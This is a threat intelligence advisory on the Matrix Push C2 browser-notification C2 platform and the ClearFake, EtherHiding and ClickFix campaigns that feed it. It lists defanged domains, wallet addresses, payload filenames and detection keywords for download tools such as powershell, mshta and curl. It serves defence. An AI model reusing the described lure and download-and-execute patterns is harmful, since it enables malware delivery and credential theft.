Browser Notification Hijack via Matrix Push C2
Threat Group – Crimeware cluster similar to UNC5142 access brokers and web compromise crews using Matrix Push C2
Threat Type – Browser based C2 platform, phishing delivery system and malware loader sold as a MaaS service
Exploited Vulnerabilities – Abuse of W3C Push API, Service Workers, notification prompts, clipboard and Run dialog through ClickFix, plus EtherHiding on BNB Smart Chain for resilient config, with no public CVEs confirmed
Malware Used – Matrix Push C2, ClearFake and CLEARSHORT JavaScript loaders, EtherHiding config layer, and delivery of Lumma, Vidar, NetSupport RAT, Atomic Stealer and Latrodectus
Threat Score – 6.8 🟠 Elevated. Cross platform browser C2 with blockchain backed config and strong social engineering but still reliant on user interaction and no confirmed browser zero day
Last Threat Observation – 23 November 2025
Overview
The cyber threat landscape in 2025 has experienced a clear shift toward techniques that operate inside the browser rather than within traditional file based executable paths. Matrix Push C2 is at the centre of this change. The platform uses legitimate browser capabilities to establish a persistent Command and Control channel that lives inside the profile data of Chrome, Edge, Firefox and other modern browsers.
ClearFake and CLEARSHORT continue to compromise large numbers of WordPress based sites and inject JavaScript that displays fake browser updates and fabricated verification checks. These lures create a pathway for fake notification prompts and for ClickFix instructions. ClickFix convinces users to copy system commands into the Windows Run dialog or macOS Terminal and press Enter. EtherHiding then uses smart contracts on the BNB Smart Chain to store payload addresses, AES keys and malicious command strings.
Matrix Push C2 is the back end Command and Control system. ClearFake and ClickFix are delivery mechanisms that feed victims into the C2 platform or deliver further payloads. This advisory corrects earlier misunderstandings by clearly separating these elements and providing a combined analysis of their role in the threat ecosystem.
Key findings and strategic implications
The browser is now a primary endpoint
Matrix Push C2 leverages standard web technology to maintain a persistent communication channel through push notifications and background processes. The malicious traffic blends with normal browsing behaviour which makes detection more difficult.
Converged ecosystem
Matrix Push C2 provides the dashboard. ClearFake and CLEARSHORT provide the compromised site delivery. ClickFix takes advantage of user trust in familiar troubleshooting steps. Together they form a mature delivery and execution pipeline.
Resilient infrastructure through blockchain storage
Configuration stored in smart contracts cannot be removed through normal domain takedown processes. Operators rotate payloads and instructions simply by updating contract parameters.
Defensive gaps in browser storage handling
Clearing history or cache does not remove malicious Service Workers. Enterprise remediation must involve direct manipulation of Service Worker directories, LevelDB databases and Firefox permission databases. Policies must be enforced through Group Policy, Intune or other mobile device management platforms.
Cross platform reach
Service Workers and the Push API work across Windows, macOS, Linux and Android. ClearFake and ClickFix campaigns also target macOS and mobile browsers. Traditional Windows centric guidance is no longer sufficient.
Threat landscape correction
Early commentary incorrectly described Matrix Push C2 as a phishing page. Matrix Push C2 is an entire Command and Control platform. ClearFake and ClickFix are delivery techniques. These must be differentiated so that internal detection, tuning and analysis are accurate.
ClearFake delivers JavaScript lures. ClickFix convinces users to execute commands. Matrix Push C2 receives victims, manages campaigns and controls browser based execution. These components can operate independently but are increasingly observed together.
The term fileless is partially correct. Matrix Push C2 does not require a Windows executable for initial persistence, but it still writes Service Worker scripts and database entries into browser profile folders. These artefacts must be examined during any incident investigation.
Technical anatomy of Matrix Push C2
Malicious Service Worker lifecycle
The hook
Users visit compromised sites that show fake update pages or verification prompts. Users are encouraged to click Allow on notification requests as part of a false security check.
Registration and persistence
When the victim accepts notifications the browser downloads a Service Worker from the attacker controlled site. The script is written into the Service Worker directory and persists across sessions.
Push subscription generation
The browser generates a subscription object which includes a vendor hosted endpoint and cryptographic keys that allow the operator to send encrypted messages.
C2 registration
The malicious Service Worker transmits the subscription object to the Matrix Push C2 dashboard. The victim appears in the operator console with browser, operating system, IP address and sometimes extension information.
Command delivery
The operator sends commands through the browser vendor push service. The Service Worker wakes, decrypts the message and carries out instructions such as creating deceptive notifications or redirecting tabs to malicious content.
Dashboard and service model
Key features include victim filtering, geographic and browser targeting, campaign templates impersonating trusted brands and analytics for click through rates. The dashboard can detect common cryptocurrency wallet extensions which allows targeted delivery of phishing notifications.
Web3 specific targeting
Recent campaigns have targeted victims who use cryptocurrency extensions. Operators use these details to deliver deceptive notifications about wallet upgrades, security validation and airdrop claims. These notifications can lead to seed phrase theft or malicious wallet interactions.
Distribution vectors
ClearFake and EtherHiding
ClearFake compromises large numbers of websites and injects loader scripts. Recent variants use EtherHiding where configuration is stored inside smart contracts on the BNB Smart Chain. The loader script queries the contract to retrieve the next stage payload location, decryption keys and ClickFix instructions.
Table 2 Blockchain indicators for ClearFake and EtherHiding
| Indicator type | Value | Purpose |
|---|---|---|
| Wallet address | 0x9179dda8B285040Bf381AABb8a1f4a1b8c37Ed53 | Holds ClearFake related contract sets |
| Wallet address | 0x53fd54f55C93f9BCCA471cD0CcbaBC3Acbd3E4AA | Hosts configuration for ClickFix operations |
| Wallet address | 0x8FBA1667BEF5EdA433928b220886A830488549BD | Additional configuration storage |
| Method ID | 0x167d1c4b | Returns AES decryption keys |
| Method ID | 0x4128180a | Returns lure HTML location |
| Method ID | 0x67685e3e | Returns PowerShell or equivalent command strings |
ClickFix lures
ClickFix is a social engineering technique that convinces users to run commands through familiar troubleshooting steps. Victims are shown errors that appear to be browser or DNS related. The lure then instructs the user to press the Windows key and R together or open the macOS terminal and then paste a command.
The copied command typically runs PowerShell or mshta with a hidden window. It then downloads payloads disguised as innocent media files. These payloads commonly include files labelled with mp4, mp3 or m4a extensions that actually contain executable script content.
Common filenames include:
- one.mp4
- ajax.mp3
- m41.mp4
- 1a.m4a
- sha589.m4a
- joke.m4a
- walking.mp3
- kangarooing.m4a
These same campaigns often load Matrix Push C2 through browser registration logic or deliver classic infostealers and remote access tools.
Indicators of compromise
Network indicators
All domains are defanged. Replace [.] with a dot only in approved testing environments.
Table 3 Malicious domains and URL patterns
| Domain or pattern | Context |
|---|---|
| alhasba[.]com | Fake browser update sequence |
| 10edveha[.]com | Fake browser update sequence |
| ert67-o9[.]pages[.]dev | ClickFix lure content |
| tour-agency-media[.]pages[.]dev | Lure HTML returned by smart contract |
| human-verify-7u[.]pages[.]dev | Fake verification challenge |
| cleaning-room-device[.]shop | Disguised payload hosting |
| ai.fdswgw[.]shop | Disguised payload hosting |
| mnjk-jk.bsdfg-zmp-q-n[.]shop | Payload storage |
| nbhg-v-iuksdfb-f[.]shop | Payload storage |
| hur-bweqlkjr[.]shop | Multiple payloads including disguised mp4 and m4a files |
| yob-yrwebsdf[.]shop | Multiple payloads |
| discover-travel-agency[.]pro | Large mixed payload set |
| ads-green-pickle-jo[.]shop | Disguised payload files |
| recaptcha-manual[.]shop | kangarooing.m4a and related files |
| recaptcha-verify-4h[.]pro | Associated payload hosting |
| human-verify[.]shop | Lure and payload storage |
| f003.backblazeb2[.]com | Backblaze storage for disguised media payloads |
Host based indicators
Registry artefacts
Investigation should include the RunMRU key at:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
Suspicious entries contain:
- powershell
- mshta
- curl
- msiexec
- bitsadmin
- forfiles
Look for encoded commands, unusual Unicode characters or phrases that mimic system documentation.
Process execution
Common process patterns include:
- explorer.exe starting powershell.exe
- Hidden or minimised window styles
- Commands that chain Invoke WebRequest, DownloadString and Start Process
Browser profile artefacts
Chrome and Edge store Service Worker and LevelDB files inside user profile directories. Entries referencing the domains listed above indicate likely compromise.
Firefox stores notification permissions in permissions.sqlite. Any suspicious origin with notification permission should be treated as an indicator.
File hashes
Hashes are not included in this report due to rapid rotation. Internal teams should maintain ongoing watchlists for recurring payloads such as kangarooing.m4a, joke.m4a and related files.
Mitigation and prevention
Mitigation checklist
Table 4 Security mitigation checklist
| Area | Status | Actions |
|---|---|---|
| Notification prompts blocked by default | Enforce through GPO or MDM | |
| Service Worker artefact monitoring | Ingest browser folder telemetry into SIEM | |
| ClearFake and EtherHiding IoCs loaded | Maintain updated detection lists | |
| PowerShell and RunMRU logging tuned | Build detection content for encoded and hidden commands | |
| macOS and mobile browser policies | Use device management to enforce notification blocks | |
| Crypto wallet risk controls | Encourage hardware wallets and reduce browser wallet exposure | |
| User training on notifications | Educate users to reject prompts from unknown sites | |
| User training on system command execution | Reinforce approval required for any copy and paste command |
Browser policy controls
Group Policy
Notification prompts should be blocked by default for Chrome and Edge on Windows. Administrators can use exclusive allow lists for essential services such as corporate mail and collaboration platforms.
Intune and other mobile device management tools
Use Settings Catalog profiles to block notification prompts on Windows, macOS and Android where supported.
Detection engineering
Detection strategies should include:
- RunMRU value monitoring
- Process trees where explorer.exe launches powershell.exe
- Alerts for hidden or encoded command execution
- Network detection of media named payloads that return script or executable content
- Push notification monitoring for unusual frequency from browser vendor endpoints
User awareness
User awareness must include:
- A rule that commands found on the web must never be pasted into system tools
- A rule that notification permission prompts from non essential sites must always be denied
- Scenarios that simulate ClearFake and ClickFix behaviour in training exercises
Traditional controls
Email filtering, endpoint protection and multi factor authentication remain essential. Although the initial C2 channel is browser based, the second stage malware families delivered by these campaigns are traditional loaders, stealers and remote access tools.
Risk assessment
Matrix Push C2 is rated as 6.8 in the Elevated category. It is highly capable and easily deployed at scale. The browser based C2 channel provides stealth and persistence. ClearFake and ClickFix dramatically increase its reach. Blockchain backed smart contracts give the operators infrastructure that is difficult to remove.
The threat does not yet reach High because it relies on user interaction and has no confirmed browser exploit. Any future development that removes the requirement for user input or uses a browser exploit chain should trigger an immediate review of this rating.
Remediation guidance
Immediate response
- Close all browser processes.
- Remove or quarantine Service Worker directories and LevelDB entries associated with suspicious origins.
- Reset Firefox permission databases if needed.
- Reset RunMRU entries that contain malicious commands.
- Conduct a full endpoint scan for common follow on payloads.
- Reset credentials used on affected devices.
Long term hardening
- Enforce strict notification control policies.
- Monitor blockchain addresses from Table 2 using cyber intelligence sources.
- Strengthen content management systems to reduce ClearFake infections.
- Expand browser telemetry ingestion into SIEM.
Conclusion
Matrix Push C2 represents a significant evolution in criminal tradecraft. By moving persistence and Command and Control into the browser itself, attackers avoid many traditional detection paths. ClearFake, EtherHiding and ClickFix create a delivery pipeline that is resilient, scalable and increasingly common.
The browser must now be managed as a critical component of the enterprise security posture. Organisations that block notifications, inspect browser storage, train users not to run copy and paste commands and integrate blockchain indicators into their intelligence program will be in a strong position to reduce risk and contain incidents.
Sources
- The Hacker News – Matrix Push C2 Uses Browser Notifications for Fileless, Cross Platform Phishing Attacks – https://thehackernews.com/2025/11/matrix-push-c2-uses-browser.html
- Dark Reading – Matrix Push C2 Tool Hijacks Browser Notifications for Phishing – https://www.darkreading.com/threat-intelligence/matrix-push-c2-tool-hijacks-browser-notifications-phishing